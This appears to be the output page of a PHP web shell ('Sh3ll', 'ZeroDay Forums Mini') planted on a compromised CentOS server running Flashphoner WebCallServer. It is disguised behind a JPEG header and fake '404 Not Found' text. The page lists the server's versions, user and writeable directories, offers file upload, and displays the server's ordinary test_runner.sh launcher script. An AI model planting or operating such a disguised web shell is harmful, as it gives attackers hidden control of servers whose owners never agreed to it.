����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /usr/local/FlashphonerWebCallServer/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/local/FlashphonerWebCallServer/bin/test_runner.sh
#!/bin/bash

WCS_APP_HOME="/usr/local/FlashphonerWebCallServer"
WCS_ENV_CONFIG="/usr/local/FlashphonerWebCallServer/bin/setenv.sh"
[ -r "$WCS_ENV_CONFIG" ] && . "$WCS_ENV_CONFIG"

ulimit -n 20000 > /dev/null 2>&1




TEST_ENV_OPTS="-XX:+UseConcMarkSweepGC -XX:+UseCMSInitiatingOccupancyOnly -XX:CMSInitiatingOccupancyFraction=70 -XX:+PrintGCDateStamps -XX:+PrintGCDetails -Xloggc:$WCS_APP_HOME/logs/gc-test.log -XX:+ExplicitGCInvokesConcurrent -Dsun.rmi.dgc.client.gcInterval=36000000000 -Dsun.rmi.dgc.server.gcInterval=36000000000"

if [[ $1 = *[!\ ]* ]]; then
    $_EXECJAVA $TEST_ENV_OPTS $WCS_JAVA_OPTS -Dcom.flashphoner.fms.AppHome="$WCS_APP_HOME" -Djava.library.path="$WCS_APP_HOME/lib/so:$WCS_APP_HOME/lib" -cp "$WCS_APP_HOME/lib/*" org.junit.runner.JUnitCore $@
else
    echo "Please specify the name of the test"
fi

ZeroDay Forums Mini